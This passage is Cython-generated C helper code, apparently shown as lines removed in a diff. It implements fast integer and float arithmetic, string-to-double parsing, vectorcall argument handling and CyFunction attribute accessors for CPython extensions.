__Pyx_PyLong_CompactValue(op1); - } else { - const digit* digits = __Pyx_PyLong_Digits(op1); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); - switch (size) { - case -2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { - a = -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { - lla = -(PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { - a = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { - lla = (PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { - a = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { - lla = -(PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { - a = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { - lla = (PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { - a = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { - lla = -(PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { - a = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { - lla = (PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - default: return PyLong_Type.tp_as_number->nb_add(op1, op2); - } - } - x = a + b; - return PyLong_FromLong(x); -#ifdef HAVE_LONG_LONG - long_long: - llx = lla + llb; - return PyLong_FromLongLong(llx); -#endif - - - } - #endif - if (PyFloat_CheckExact(op1)) { - const long b = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double a = __pyx_PyFloat_AsDouble(op1); -#else - double a = PyFloat_AS_DOUBLE(op1); -#endif - double result; - - PyFPE_START_PROTECT("add", return NULL) - result = ((double)a) + (double)b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); - } - return (inplace ? PyNumber_InPlaceAdd : PyNumber_Add)(op1, op2); -} -#endif - -/* py_abs */ -#if CYTHON_USE_PYLONG_INTERNALS -static PyObject *__Pyx_PyLong_AbsNeg(PyObject *n) { -#if PY_VERSION_HEX >= 0x030C00A7 - if (likely(__Pyx_PyLong_IsCompact(n))) { - return PyLong_FromSize_t(__Pyx_PyLong_CompactValueUnsigned(n)); - } -#else - if (likely(Py_SIZE(n) == -1)) { - return PyLong_FromUnsignedLong(__Pyx_PyLong_Digits(n)[0]); - } -#endif -#if CYTHON_COMPILING_IN_CPYTHON - { - PyObject *copy = _PyLong_Copy((PyLongObject*)n); - if (likely(copy)) { - #if PY_VERSION_HEX >= 0x030C00A7 - ((PyLongObject*)copy)->long_value.lv_tag = ((PyLongObject*)copy)->long_value.lv_tag & ~_PyLong_SIGN_MASK; - #else - __Pyx_SET_SIZE(copy, -Py_SIZE(copy)); - #endif - } - return copy; - } -#else - return PyNumber_Negative(n); -#endif -} -#endif - -/* PyFloatBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyFloat_TrueDivideObjC(PyObject *op1, PyObject *op2, double floatval, int inplace, int zerodivision_check) { - const double b = floatval; - double a, result; - CYTHON_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - if (likely(PyFloat_CheckExact(op1))) { -#if CYTHON_COMPILING_IN_LIMITED_API - a = __pyx_PyFloat_AsDouble(op1); -#else - a = PyFloat_AS_DOUBLE(op1); -#endif - - } else - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - a = (double) PyInt_AS_LONG(op1); - - } else - #endif - if (likely(PyLong_CheckExact(op1))) { - #if CYTHON_USE_PYLONG_INTERNALS - if (__Pyx_PyLong_IsZero(op1)) { - a = 0.0; - - } else if (__Pyx_PyLong_IsCompact(op1)) { - a = (double) __Pyx_PyLong_CompactValue(op1); - } else { - const digit* digits = __Pyx_PyLong_Digits(op1); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); - switch (size) { - case -2: - case 2: - if (8 * sizeof(unsigned long) > 2 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (1 * PyLong_SHIFT < 53))) { - a = (double) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (2 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -2) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - case -3: - case 3: - if (8 * sizeof(unsigned long) > 3 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (2 * PyLong_SHIFT < 53))) { - a = (double) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (3 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -3) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - case -4: - case 4: - if (8 * sizeof(unsigned long) > 4 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (3 * PyLong_SHIFT < 53))) { - a = (double) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (4 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -4) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - default: - #endif - a = PyLong_AsDouble(op1); - if (unlikely(a == -1.0 && PyErr_Occurred())) return NULL; - #if CYTHON_USE_PYLONG_INTERNALS - } - } - #endif - } else { - return (inplace ? PyNumber_InPlaceTrueDivide : PyNumber_TrueDivide)(op1, op2); - } - PyFPE_START_PROTECT("divide", return NULL) - result = a / b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); -} -#endif - -/* pybytes_as_double */ -static double __Pyx_SlowPyString_AsDouble(PyObject *obj) { - PyObject *float_value; -#if PY_MAJOR_VERSION >= 3 - float_value = PyFloat_FromString(obj); -#else - float_value = PyFloat_FromString(obj, 0); -#endif - if (likely(float_value)) { - double value = PyFloat_AS_DOUBLE(float_value); - Py_DECREF(float_value); - return value; - } - return (double)-1; -} -static const char* __Pyx__PyBytes_AsDouble_Copy(const char* start, char* buffer, Py_ssize_t length) { - int last_was_punctuation = 1; - Py_ssize_t i; - for (i=0; i < length; i++) { - char chr = start[i]; - int is_punctuation = (chr == '_') | (chr == '.') | (chr == 'e') | (chr == 'E'); - *buffer = chr; - buffer += (chr != '_'); - if (unlikely(last_was_punctuation & is_punctuation)) goto parse_failure; - last_was_punctuation = is_punctuation; - } - if (unlikely(last_was_punctuation)) goto parse_failure; - *buffer = '\0'; - return buffer; -parse_failure: - return NULL; -} -static double __Pyx__PyBytes_AsDouble_inf_nan(const char* start, Py_ssize_t length) { - int matches = 1; - char sign = start[0]; - int is_signed = (sign == '+') | (sign == '-'); - start += is_signed; - length -= is_signed; - switch (start[0]) { - #ifdef Py_NAN - case 'n': - case 'N': - if (unlikely(length != 3)) goto parse_failure; - matches &= (start[1] == 'a' || start[1] == 'A'); - matches &= (start[2] == 'n' || start[2] == 'N'); - if (unlikely(!matches)) goto parse_failure; - return (sign == '-') ? -Py_NAN : Py_NAN; - #endif - case 'i': - case 'I': - if (unlikely(length < 3)) goto parse_failure; - matches &= (start[1] == 'n' || start[1] == 'N'); - matches &= (start[2] == 'f' || start[2] == 'F'); - if (likely(length == 3 && matches)) - return (sign == '-') ? -Py_HUGE_VAL : Py_HUGE_VAL; - if (unlikely(length != 8)) goto parse_failure; - matches &= (start[3] == 'i' || start[3] == 'I'); - matches &= (start[4] == 'n' || start[4] == 'N'); - matches &= (start[5] == 'i' || start[5] == 'I'); - matches &= (start[6] == 't' || start[6] == 'T'); - matches &= (start[7] == 'y' || start[7] == 'Y'); - if (unlikely(!matches)) goto parse_failure; - return (sign == '-') ? -Py_HUGE_VAL : Py_HUGE_VAL; - case '.': case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': - break; - default: - goto parse_failure; - } - return 0.0; -parse_failure: - return -1.0; -} -static CYTHON_INLINE int __Pyx__PyBytes_AsDouble_IsSpace(char ch) { - return (ch == 0x20) | !((ch < 0x9) | (ch > 0xd)); -} -CYTHON_UNUSED static double __Pyx__PyBytes_AsDouble(PyObject *obj, const char* start, Py_ssize_t length) { - double value; - Py_ssize_t i, digits; - const char *last = start + length; - char *end; - while (__Pyx__PyBytes_AsDouble_IsSpace(*start)) - start++; - while (start < last - 1 && __Pyx__PyBytes_AsDouble_IsSpace(last[-1])) - last--; - length = last - start; - if (unlikely(length <= 0)) goto fallback; - value = __Pyx__PyBytes_AsDouble_inf_nan(start, length); - if (unlikely(value == -1.0)) goto fallback; - if (value != 0.0) return value; - digits = 0; - for (i=0; i < length; digits += start[i++] != '_'); - if (likely(digits == length)) { - value = PyOS_string_to_double(start, &end, NULL); - } else if (digits < 40) { - char number[40]; - last = __Pyx__PyBytes_AsDouble_Copy(start, number, length); - if (unlikely(!last)) goto fallback; - value = PyOS_string_to_double(number, &end, NULL); - } else { - char *number = (char*) PyMem_Malloc((digits + 1) * sizeof(char)); - if (unlikely(!number)) goto fallback; - last = __Pyx__PyBytes_AsDouble_Copy(start, number, length); - if (unlikely(!last)) { - PyMem_Free(number); - goto fallback; - } - value = PyOS_string_to_double(number, &end, NULL); - PyMem_Free(number); - } - if (likely(end == last) || (value == (double)-1 && PyErr_Occurred())) { - return value; - } -fallback: - return __Pyx_SlowPyString_AsDouble(obj); -} - -/* pynumber_float */ -static CYTHON_INLINE PyObject* __Pyx__PyNumber_Float(PyObject* obj) { - double val; - if (PyLong_CheckExact(obj)) { -#if CYTHON_USE_PYLONG_INTERNALS - if (likely(__Pyx_PyLong_IsCompact(obj))) { - val = (double) __Pyx_PyLong_CompactValue(obj); - goto no_error; - } -#endif - val = PyLong_AsDouble(obj); - } else if (PyUnicode_CheckExact(obj)) { - val = __Pyx_PyUnicode_AsDouble(obj); - } else if (PyBytes_CheckExact(obj)) { - val = __Pyx_PyBytes_AsDouble(obj); - } else if (PyByteArray_CheckExact(obj)) { - val = __Pyx_PyByteArray_AsDouble(obj); - } else { - return PyNumber_Float(obj); - } - if (unlikely(val == -1 && PyErr_Occurred())) { - return NULL; - } -#if CYTHON_USE_PYLONG_INTERNALS -no_error: -#endif - return PyFloat_FromDouble(val); -} - -/* PyFloatBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static int __Pyx_PyFloat_BoolEqObjC(PyObject *op1, PyObject *op2, double floatval, int inplace, int zerodivision_check) { - const double b = floatval; - double a; - CYTHON_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - if (op1 == op2) { - return 1; - } - if (likely(PyFloat_CheckExact(op1))) { -#if CYTHON_COMPILING_IN_LIMITED_API - a = __pyx_PyFloat_AsDouble(op1); -#else - a = PyFloat_AS_DOUBLE(op1); -#endif - - } else - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - a = (double) PyInt_AS_LONG(op1); - - } else - #endif - if (likely(PyLong_CheckExact(op1))) { - #if CYTHON_USE_PYLONG_INTERNALS - if (__Pyx_PyLong_IsZero(op1)) { - a = 0.0; - - } else if (__Pyx_PyLong_IsCompact(op1)) { - a = (double) __Pyx_PyLong_CompactValue(op1); - } else { - const digit* digits = __Pyx_PyLong_Digits(op1); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); - switch (size) { - case -2: - case 2: - if (8 * sizeof(unsigned long) > 2 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (1 * PyLong_SHIFT < 53))) { - a = (double) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (2 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -2) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - case -3: - case 3: - if (8 * sizeof(unsigned long) > 3 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (2 * PyLong_SHIFT < 53))) { - a = (double) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (3 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -3) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - case -4: - case 4: - if (8 * sizeof(unsigned long) > 4 * PyLong_SHIFT && ((8 * sizeof(unsigned long) < 53) || (3 * PyLong_SHIFT < 53))) { - a = (double) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - if ((8 * sizeof(unsigned long) < 53) || (4 * PyLong_SHIFT < 53) || (a < (double) ((PY_LONG_LONG)1 << 53))) { - if (size == -4) - a = -a; - break; - } - } - CYTHON_FALLTHROUGH; - default: - #endif - return __Pyx_PyObject_IsTrueAndDecref( - PyFloat_Type.tp_richcompare(op2, op1, Py_EQ)); - #if CYTHON_USE_PYLONG_INTERNALS - } - } - #endif - } else { - return __Pyx_PyObject_IsTrueAndDecref( - PyObject_RichCompare(op1, op2, Py_EQ)); - } - if (a == b) { - return 1; - } else { - return 0; - } -} -#endif - -/* PyIntBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_SubtractCObj(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_MAYBE_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op2))) { - const long a = intval; - long x; - long b = PyInt_AS_LONG(op2); - - x = (long)((unsigned long)a - (unsigned long)b); - if (likely((x^a) >= 0 || (x^~b) >= 0)) - return PyInt_FromLong(x); - return PyLong_Type.tp_as_number->nb_subtract(op1, op2); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op2))) { - const long a = intval; - long b, x; -#ifdef HAVE_LONG_LONG - const PY_LONG_LONG lla = intval; - PY_LONG_LONG llb, llx; -#endif - if (unlikely(__Pyx_PyLong_IsZero(op2))) { - return __Pyx_NewRef(op1); - } - if (likely(__Pyx_PyLong_IsCompact(op2))) { - b = __Pyx_PyLong_CompactValue(op2); - } else { - const digit* digits = __Pyx_PyLong_Digits(op2); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op2); - switch (size) { - case -2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { - b = -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { - llb = -(PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { - b = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { - llb = (PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { - b = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { - llb = -(PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { - b = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { - llb = (PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { - b = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { - llb = -(PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { - b = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { - llb = (PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - default: return PyLong_Type.tp_as_number->nb_subtract(op1, op2); - } - } - x = a - b; - return PyLong_FromLong(x); -#ifdef HAVE_LONG_LONG - long_long: - llx = lla - llb; - return PyLong_FromLongLong(llx); -#endif - - - } - #endif - if (PyFloat_CheckExact(op2)) { - const long a = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double b = __pyx_PyFloat_AsDouble(op2); -#else - double b = PyFloat_AS_DOUBLE(op2); -#endif - double result; - - PyFPE_START_PROTECT("subtract", return NULL) - result = ((double)a) - (double)b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); - } - return (inplace ? PyNumber_InPlaceSubtract : PyNumber_Subtract)(op1, op2); -} -#endif - -/* RaiseClosureNameError */ -static CYTHON_INLINE void __Pyx_RaiseClosureNameError(const char *varname) { - PyErr_Format(PyExc_NameError, "free variable '%s' referenced before assignment in enclosing scope", varname); -} - -/* PyVectorcallFastCallDict */ -#if CYTHON_METH_FASTCALL -static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) -{ - PyObject *res = NULL; - PyObject *kwnames; - PyObject **newargs; - PyObject **kwvalues; - Py_ssize_t i, pos; - size_t j; - PyObject *key, *value; - unsigned long keys_are_strings; - Py_ssize_t nkw = PyDict_GET_SIZE(kw); - newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); - if (unlikely(newargs == NULL)) { - PyErr_NoMemory(); - return NULL; - } - for (j = 0; j < nargs; j++) newargs[j] = args[j]; - kwnames = PyTuple_New(nkw); - if (unlikely(kwnames == NULL)) { - PyMem_Free(newargs); - return NULL; - } - kwvalues = newargs + nargs; - pos = i = 0; - keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; - while (PyDict_Next(kw, &pos, &key, &value)) { - keys_are_strings &= Py_TYPE(key)->tp_flags; - Py_INCREF(key); - Py_INCREF(value); - PyTuple_SET_ITEM(kwnames, i, key); - kwvalues[i] = value; - i++; - } - if (unlikely(!keys_are_strings)) { - PyErr_SetString(PyExc_TypeError, "keywords must be strings"); - goto cleanup; - } - res = vc(func, newargs, nargs, kwnames); -cleanup: - Py_DECREF(kwnames); - for (i = 0; i < nkw; i++) - Py_DECREF(kwvalues[i]); - PyMem_Free(newargs); - return res; -} -static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) -{ - if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { - return vc(func, args, nargs, NULL); - } - return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); -} -#endif - -/* CythonFunctionShared */ -#if CYTHON_COMPILING_IN_LIMITED_API -static CYTHON_INLINE int __Pyx__IsSameCyOrCFunction(PyObject *func, void *cfunc) { - if (__Pyx_CyFunction_Check(func)) { - return PyCFunction_GetFunction(((__pyx_CyFunctionObject*)func)->func) == (PyCFunction) cfunc; - } else if (PyCFunction_Check(func)) { - return PyCFunction_GetFunction(func) == (PyCFunction) cfunc; - } - return 0; -} -#else -static CYTHON_INLINE int __Pyx__IsSameCyOrCFunction(PyObject *func, void *cfunc) { - return __Pyx_CyOrPyCFunction_Check(func) && __Pyx_CyOrPyCFunction_GET_FUNCTION(func) == (PyCFunction) cfunc; -} -#endif -static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { -#if PY_VERSION_HEX < 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - __Pyx_Py_XDECREF_SET( - __Pyx_CyFunction_GetClassObj(f), - ((classobj) ? __Pyx_NewRef(classobj) : NULL)); -#else - __Pyx_Py_XDECREF_SET( - ((PyCMethodObject *) (f))->mm_class, - (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); -#endif -} -static PyObject * -__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) -{ - CYTHON_UNUSED_VAR(closure); - if (unlikely(op->func_doc == NULL)) { -#if CYTHON_COMPILING_IN_LIMITED_API - op->func_doc = PyObject_GetAttrString(op->func, "__doc__"); - if (unlikely(!op->func_doc)) return NULL; -#else - if (((PyCFunctionObject*)op)->m_ml->ml_doc) { -#if PY_MAJOR_VERSION >= 3 - op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); -#else - op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); -#endif - if (unlikely(op->func_doc == NULL)) - return NULL; - } else { - Py_INCREF(Py_None); - return Py_None; - } -#endif - } - Py_INCREF(op->func_doc); - return op->func_doc; -} -static int -__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); - if (value == NULL) { - value = Py_None; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->func_doc, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(context); - if (unlikely(op->func_name == NULL)) { -#if CYTHON_COMPILING_IN_LIMITED_API - op->func_name = PyObject_GetAttrString(op->func, "__name__"); -#elif PY_MAJOR_VERSION >= 3 - op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); -#else - op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); -#endif - if (unlikely(op->func_name == NULL)) - return NULL; - } - Py_INCREF(op->func_name); - return op->func_name; -} -static int -__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); -#if PY_MAJOR_VERSION >= 3 - if (unlikely(value == NULL || !PyUnicode_Check(value))) -#else - if (unlikely(value == NULL || !PyString_Check(value))) -#endif - { - PyErr_SetString(PyExc_TypeError, - "__name__ must be set to a string object"); - return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->func_name, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(context); - Py_INCREF(op->func_qualname); - return op->func_qualname; -} -static int -__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); -#if PY_MAJOR_VERSION >= 3 - if (unlikely(value == NULL || !PyUnicode_Check(value))) -#else - if (unlikely(value == NULL || !PyString_Check(value))) -#endif - { - PyErr_SetString(PyExc_TypeError, - "__qualname__ must be set to a string object"); - return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->func_qualname, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(context); - if (unlikely(op->func_dict == NULL)) { - op->func_dict = PyDict_New(); - if (unlikely(op->func_dict == NULL)) - return NULL; - } - Py_INCREF(op->func_dict); - return op->func_dict; -} -static int -__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); - if (unlikely(value == NULL)) { - PyErr_SetString(PyExc_TypeError, - "function's dictionary may not be deleted"); - return -1; - } - if (unlikely(!PyDict_Check(value))) { - PyErr_SetString(PyExc_TypeError, - "setting function's dictionary to a non-dict"); - return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(op->func_dict, value); - return 0; -} -static PyObject * -__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(context); - Py_INCREF(op->func_globals); - return op->func_globals; -} -static PyObject * -__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) -{ - CYTHON_UNUSED_VAR(op); - CYTHON_UNUSED_VAR(context); - Py_INCREF(Py_None); - return Py_None; -} -static PyObject * -__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) -{ - PyObject* result = (op->func_code) ? op->func_code : Py_None; - CYTHON_UNUSED_VAR(context); - Py_INCREF(result); - return result; -} -static int -__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { - int result = 0; - PyObject *res = op->defaults_getter((PyObject *) op); - if (unlikely(!res)) - return -1; - #if 